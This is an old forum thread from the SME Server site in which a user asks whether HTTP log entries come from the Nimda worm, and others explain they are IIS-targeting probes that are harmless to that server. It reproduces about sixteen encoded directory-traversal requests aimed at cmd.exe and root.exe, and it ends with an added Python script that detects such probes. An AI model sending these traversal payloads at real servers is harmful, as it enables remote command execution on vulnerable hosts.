Koozali.org: home of the SME Server

NIMBA

Christian

NIMBA
« on: June 28, 2002, 02:57:16 PM »
I just downloaded SME server from a NL ftp mirror.
6 hours after installation this code was found in the HTTP log
Is it a Virus "Nimba" ????
If yes, How can it be in SME server so fast????????????????
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
"GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"

Christian. Denmark

Jon Blakely

Re: NIMBA
« Reply #1 on: June 28, 2002, 04:12:40 PM »
Christian,

Yes that is NIMDA but it is nothing to worry about, apart from wasting a bit of bandwidth it is harmless. It only affects M$ IIS web servers.
It is not in your server but is infected M$ servers trying to give it to you.
You will probably get another one that is a string of NNNNNNN's. That is Code Red or Code Red II. It is also harmless.

Jon

Holger

Re: NIMBA
« Reply #2 on: June 28, 2002, 04:15:02 PM »
Hej Christian

I think everybody gets those if you're connected to the internet!

It is showing that somebody or something (script kiddies or a virus) is attempting to exploit some security vulnerabilities. Only they are _very_ stupid, since they have not detected that your box is not a windoze box.

Don't worry - it's not harmful to you except for your lost bandwidth and cpu cycles.

There's nothing you can do about it either :(
It's just the common general pollution of the internet.

Holger

Johan

Re: NIMBA
« Reply #3 on: June 29, 2002, 03:19:31 PM »
It's not nimda,

it's someone who scans your server for security flaws..
in this case he's scanning for the unicode-bug...
but you don't have to worry... you don't have NT/IIS :)

greetzz

Christian

Re: NIMBA --THANKS ALL
« Reply #4 on: June 29, 2002, 11:12:17 PM »
Thanks all
I'm new to these servers, have only been working with windows 2000 adv srv.
So thanks again....

Christian.....
one never gets too old to learn something new
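Added example, not part of the original thread: a small Python triage script for access-log lines like the ones in the first post. It decodes each request path repeatedly and tags what the encoding was hiding; the tag names, the `needs_follow_up` rule (a tagged request answered with a status below 400) and the two lines marked "constructed" are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

REQUEST = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/\d\.\d" (\d{3})')
TRAVERSAL = re.compile(rb'\.\.[\\/]')
SHELL = re.compile(rb'(?:cmd|root)\.exe$', re.I)
BAD_ESCAPE = re.compile(rb'%(?![0-9A-Fa-f]{2})')

# First four lines are copied from the thread; the last two are constructed.
SAMPLE = [
    '"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"',
    '"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"',
    '"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"',
    '"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"',
    '"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 1432 "-" "-"',
    '"GET /index.html HTTP/1.0" 200 1024 "-" "-"',
]

def classify(line):
    """Return (status, tags) for one log line, or None if it holds no request."""
    m = REQUEST.search(line)
    if m is None:
        return None
    path = m.group(1).split("?", 1)[0].encode("utf-8")
    tags = set()
    if BAD_ESCAPE.search(path):          # '%' not followed by two hex digits
        tags.add("malformed-escape")
    passes = 0
    while passes < 4:                    # decode until nothing changes
        decoded = unquote_to_bytes(path)
        if decoded == path:
            break
        path, passes = decoded, passes + 1
    if passes > 1:                       # an escape was hidden inside an escape
        tags.add("double-encoded")
    if b"\xc0" in path or b"\xc1" in path:   # bytes never valid in UTF-8
        tags.add("overlong-utf8")
    if TRAVERSAL.search(path):
        tags.add("traversal")
    if SHELL.search(path):
        tags.add("shell-target")
    return int(m.group(2)), tags

def needs_follow_up(line):
    """Assumed rule: a tagged probe that was not rejected with 4xx/5xx."""
    result = classify(line)
    return bool(result and result[1] and result[0] < 400)

if __name__ == "__main__":
    for entry in SAMPLE:
        print(classify(entry), needs_follow_up(entry))
```

Every line from the thread comes back with a 404 or 400 status, so none of them is flagged for follow-up; only the constructed 200 line is.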